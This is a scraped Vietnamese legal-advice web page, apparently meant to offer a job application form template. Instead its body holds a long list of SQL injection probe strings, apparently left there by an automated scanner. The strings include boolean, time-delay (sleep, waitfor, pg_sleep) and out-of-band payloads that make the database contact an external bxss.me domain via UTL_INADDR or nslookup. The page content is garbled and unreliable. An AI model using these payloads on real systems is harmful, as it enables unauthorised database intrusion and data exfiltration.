Bạn cần tư vấn Pháp luật?
Hãy gọi : 1900 6188
"Tổng đài tư vấn pháp luật 1900 6188" là dịch vụ tư vấn luật qua điện thoại của Công ty Luật VinaBiz
  • Tư vấn trực tuyến miễn phí
  • Đội ngũ Luật sư uy tín
  • Tư vấn 24/7
Luật sư tư vấn pháp luật online miễn phí đầu số 1900 6188

Mẫu đơn xin việc

Cập nhật lần cuối lúc 09:58 ngày 17/09/2014

1
1
1
1
-1 OR 2+658-658-1=0+0+0+1 --
1'"
\
-1 OR 3+658-658-1=0+0+0+1 --
1
-1 OR 3*2<(0+5+658-658) --
@@NYrL9
-1 OR 3*2>(0+5+658-658) --
JyI=
-1 OR 2+218-218-1=0+0+0+1
-1 OR 3+218-218-1=0+0+0+1
-1 OR 3*2<(0+5+218-218)
-1 OR 3*2>(0+5+218-218)
-1' OR 2+525-525-1=0+0+0+1 --
-1' OR 3+525-525-1=0+0+0+1 --
-1' OR 3*2<(0+5+525-525) --
-1' OR 3*2>(0+5+525-525) --
-1' OR 2+398-398-1=0+0+0+1 or 'EepDGVBH'='
-1' OR 3+398-398-1=0+0+0+1 or 'EepDGVBH'='
-1' OR 3*2<(0+5+398-398) or 'EepDGVBH'='
-1' OR 3*2>(0+5+398-398) or 'EepDGVBH'='
-1" OR 2+67-67-1=0+0+0+1 --
-1" OR 3+67-67-1=0+0+0+1 --
-1" OR 3*2<(0+5+67-67) --
-1" OR 3*2>(0+5+67-67) --
if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/
(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/
-1; waitfor delay '0:0:3' --
-1); waitfor delay '0:0:3' --
1 waitfor delay '0:0:6' --
GQAByLIf'; waitfor delay '0:0:6' --
-1;select pg_sleep(6); --
-1);select pg_sleep(6); --
-1));select pg_sleep(9); --
Pmz9wLRo';select pg_sleep(9); --
cTm4XfN4');select pg_sleep(6); --
34bedUka'));select pg_sleep(6); --
1||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-5273.34060.0afc1.1.bxss'||'.me')
'||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-5274.34060.0afc1.1.bxss'||'.me')||'
1;copy (select '') to program 'nslookup dns.sqli.\027931.34060-5278.34060.0afc1.\1.bxss.me'
1';copy (select '') to program 'nslookup dns.sqli.\027931.34060-5280.34060.0afc1.\1.bxss.me
796'

Tư vấn pháp luật online miễn phí đầu số 1900 6188

Đặt câu hỏi

Họ tên:
Email:
Tiêu đề: